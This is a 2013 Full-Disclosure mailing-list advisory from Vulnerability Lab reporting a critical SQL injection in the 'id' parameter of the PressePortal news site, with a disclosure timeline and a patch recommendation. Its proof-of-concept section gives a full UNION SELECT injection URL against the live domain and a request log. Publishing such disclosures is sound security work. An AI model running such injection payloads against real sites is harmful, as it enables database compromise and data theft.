[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-11-28 17:42:47
Message-ID: 52978097.2080008 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1150
Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115
Release Date:
=============
2013-11-28
Vulnerability Laboratory ID (VL-ID):
====================================
1150
Common Vulnerability Scoring System:
====================================
8.7
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a critical SQL Injection web \
vulnerability in the official News-Aktuell - PressePortal website web-application.
Vulnerability Disclosure Timeline:
==================================
2013-04-26: Researcher Notification & Coordination (Marco Onorati)
2013-05-01: Vendor Notification (PressePortal Team)
2013-11-28: Vendor Response/Feedback(PressePortal Team)
2013-11-28: Vendor Fix/Patch (PressePortal Developer Team)
2013-11-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official \
News-Aktuell - PressePortal website web-application. The vulnerability allows remote \
attacker to execute own sql commands by usage of a vulnerable application value GET \
method request.
The vulnerability is located in the `../services/content` module with the vulnerable \
iframe.htx file. Remote attackers are able to inject own sql commands by usage of \
the vulnerable `id` parameter. After the inject the website returns with a a \
obviously blank page but when you watch the source the execute is in the listed rss \
and context values. The issue is a classic remote sql injection. The security risk \
of the remote sql injection web vulnerability is estimated as critical with a cvss \
(common vulnerability scoring system) count of 8.7(+).
Exploitation of the sql injection web vulnerability requires no privileged web \
application user account and also no user interaction. Successful exploitation of \
the vulnerability results in web application (website), account system & dbms \
compromise.
Vulnerable Module(s):
[+] services/content
Vulnerable File(s):
[+] iframe.htx
Vulnerable Parameter(s):
[+] id
Affected Domain(s):
[+] http://www.presseportal.de
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers \
without user interaction and also without privileged web application user account. \
For security demonstration or to reproduce the vulnerability follow the provided \
information and steps below.
PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd90 \
4314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14, \
15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,
44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true
-- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx
?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true \
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[3145] Mime Type[text/html]
Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1;
PressePortalDeDst=portal6-pp.de;
__utma=239002817.282394538.1385649109.1385649109.1385649109.1;
__utmb=239002817.4.10.1385649109; __utmc=239002817; \
__utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \
__atuvc=2%7C48; POPUPCHECK=1385735515782] Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]
Refernce(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id
Picture(s):
../1.png
../2.png
../3.png
Resource(s):
../iframe.htx.htm
Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a secure (prepared) statement in the id \
GET method request of the iframe.htx file.
Security Risk:
==============
The security risk of the remote sql injection web vulnerability is estimated as \
critical. The vulnerability allows attackers to compromise the application, \
web-server and service dbms.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marco Onorati (m.onorati@web.de) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic